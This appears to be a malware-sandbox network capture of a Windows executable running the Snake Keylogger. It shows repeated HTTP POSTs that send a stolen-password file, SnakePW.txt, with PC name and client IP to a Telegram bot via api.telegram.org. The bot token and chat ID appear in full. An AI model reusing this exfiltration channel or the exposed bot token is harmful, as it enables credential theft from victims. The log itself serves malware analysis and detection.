                                                                    2022-06-26 07:33:45 UTC262OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 66 62 66 62 38 61 36 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5756fbfb8a63Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:33:45 UTC262INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:33:45 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:33:45 UTC262INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 39 32 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 32 35 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66921,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228825,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    156192.168.2.550011149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:33:45 UTC263OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5756fc3abb98
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:33:45 UTC263OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 66 63 33 61 62 62 39 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5756fc3abb98Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:33:45 UTC264INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:33:45 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:33:45 UTC264INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 39 32 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 32 35 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66922,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228825,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    157192.168.2.550012149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:33:45 UTC265OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5756fc767c16
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:33:45 UTC265OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 66 63 37 36 37 63 31 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5756fc767c16Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:33:46 UTC265INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:33:46 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:33:46 UTC266INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 39 32 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 32 36 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66923,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228826,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    158192.168.2.550013149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:33:46 UTC266OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5756fcc300e3
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:33:46 UTC267OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 66 63 63 33 30 30 65 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5756fcc300e3Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:33:46 UTC267INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:33:46 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 506
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:33:46 UTC268INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 39 32 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 32 36 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66924,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228826,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    159192.168.2.550014149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:33:46 UTC268OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5756fd0035e8
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:33:46 UTC268OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 66 64 30 30 33 35 65 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5756fd0035e8Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:33:46 UTC269INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:33:46 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:33:46 UTC269INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 39 32 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 32 36 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66925,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228826,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    16192.168.2.549784149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:32:44 UTC27OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5756d82988cb
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:32:44 UTC27OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 64 38 32 39 38 38 63 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5756d82988cbContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:32:45 UTC27INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:32:45 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:32:45 UTC28INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 37 36 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 36 35 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66763,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228765,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    160192.168.2.550015149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:33:47 UTC270OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5756fd35462b
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:33:47 UTC270OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 66 64 33 35 34 36 32 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5756fd35462bContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:33:47 UTC271INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:33:47 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:33:47 UTC271INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 39 32 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 32 37 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66926,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228827,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    161192.168.2.550016149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:33:47 UTC271OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5756fd90de94
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
